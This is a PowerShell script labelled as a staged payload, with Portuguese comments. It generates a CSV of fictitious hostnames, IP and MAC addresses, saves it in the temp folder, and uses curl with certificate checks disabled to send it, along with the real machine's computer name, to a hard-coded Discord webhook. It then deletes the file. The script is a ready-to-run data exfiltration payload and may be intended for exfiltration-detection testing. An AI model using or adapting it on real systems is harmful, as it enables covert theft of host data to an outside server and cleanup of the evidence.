# PAYLOAD (.ps1) - Hostinfo Generator Staged
$u = 'https://discord.com/api/webhooks/1484361195443196066/GoX9619rfnS7zha8MBZzXEdsReSFosFYFbtFyVfNPVxybJXyXVw7TkLPoj5M-g6nWaXX'

# Função para gerar MAC aleatório
function Get-RandomMac {
    $hex = 0..15 | ForEach-Object { "{0:X}" -f $_ }
    $mac = (1..6 | ForEach-Object { ($hex | Get-Random) + ($hex | Get-Random) }) -join ':'
    return $mac
}

# Geração de 10 entradas fictícias (CSV)
$report = "Host,IP Address,MAC Address`n"
$sites = @('RUB','BER','DUC','KIE','CAN','HAK')
$types = @('L','V','S','T','D')

for ($i=1; $i -le 10; $i++) {
    $hostName = "$($sites | Get-Random)-$($types | Get-Random)$(Get-Random -Minimum 10000 -Maximum 99999)"
    $ip = "$(Get-Random -Min 1 -Max 254).$(Get-Random -Min 0 -Max 255).$(Get-Random -Min 0 -Max 255).$(Get-Random -Min 1 -Max 254)"
    $mac = Get-RandomMac
    $report += "$hostName,$ip,$mac`n"
}

# Salvar temporariamente e exfiltrar
$f = "$env:TEMP\hostinfo.csv"
$report | Out-File -FilePath $f -Encoding ascii

curl.exe -k -s -F ('payload=' + [char]64 + 'Relatorio HostInfo gerado no host: ' + $env:COMPUTERNAME) $u
curl.exe -k -s -F ('file=' + [char]64 + $f) $u

Remove-Item $f
exit
